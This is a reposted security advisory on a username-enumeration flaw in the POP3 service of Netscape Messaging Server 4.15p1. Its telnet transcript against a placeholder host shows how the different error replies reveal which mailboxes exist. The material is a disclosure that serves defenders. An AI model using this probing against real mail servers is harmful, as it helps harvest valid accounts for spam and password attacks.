Netscape Messaging Server reveals information (error handling) ------------------------------------------------------------------------ SUMMARY <http://www.iplanet.com/products/infrastructure/messaging/n_mess/> Netscape Messaging Server is a carrier-grade, high-performance messaging solution that delivers superior scalability, performance, and administration. The product contains a vulnerability that allows remote attackers to find out whether a provided username is wrong, or that the provided password was wrong (this leaks out sensitive information, as usually servers should not give indication to whether the username is correct or not). DETAILS Vulnerable systems: Netscape Messaging Server (a.k.a iPlanet Messaging server) 4.15p1 The problem is that the POP3 server displays a different message for an authentication error due to an invalid password then for one due to an invalid username. This could be used to "harvest" email addresses for spam lists, or any other form of attack. Example: An account test.user has been created while the account invalid.user doesn't exist. $ telnet someserver.example.com 110 Trying 172.16.10.107... Connected to someserver.example.com (172.16.10.107). Escape character is '^]'. +OK someserver.example.com POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000)) USER test.user +OK Name is a valid mailbox PASS blah -ERR Password incorrect quit +OK Connection closed by foreign host. $ telnet someserver.example.com 110 Trying 172.16.10.107... Connected to someserver.example.com (172.16.10.107). Escape character is '^]'. +OK someserver.example.com POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000)) user invalid.user +OK Name is a valid mailbox PASS blah -ERR User unknown quit +OK Connection closed by foreign host. -- Eko Sulistiono MIKRODATA & AntiVirus Media Web: http://www.mikrodata.co.id/ WAP: http://www.mikrodata.co.id/wap/index.wml This message contains no viruses. Guaranteed by AVP. ------------------------------------------------------------------------ Forum Komunikasi Penulis-Pembaca MIKRODATA (FKPPM) Informasi : http:[EMAIL PROTECTED] Arsip : http://www.mail-archive.com/forum%40mikrodata.co.id/ WAP : http://mikrodata.co.id/wap/index.wml Milis ini menjadi kontribusi beberapa rubrik yang diasuh tim MIKRODATA. Termasuk rubrik-rubrik yang ada di media lain. Memakai, Menyebarluaskan, dan Memperbanyak software bajakan adalah tindakan kriminal. Please check with the latest AVP update before you ask about virus: ftp://mikrodata.co.id/avirus_&_security/AntiViral_Toolkit_Pro/avp30.zip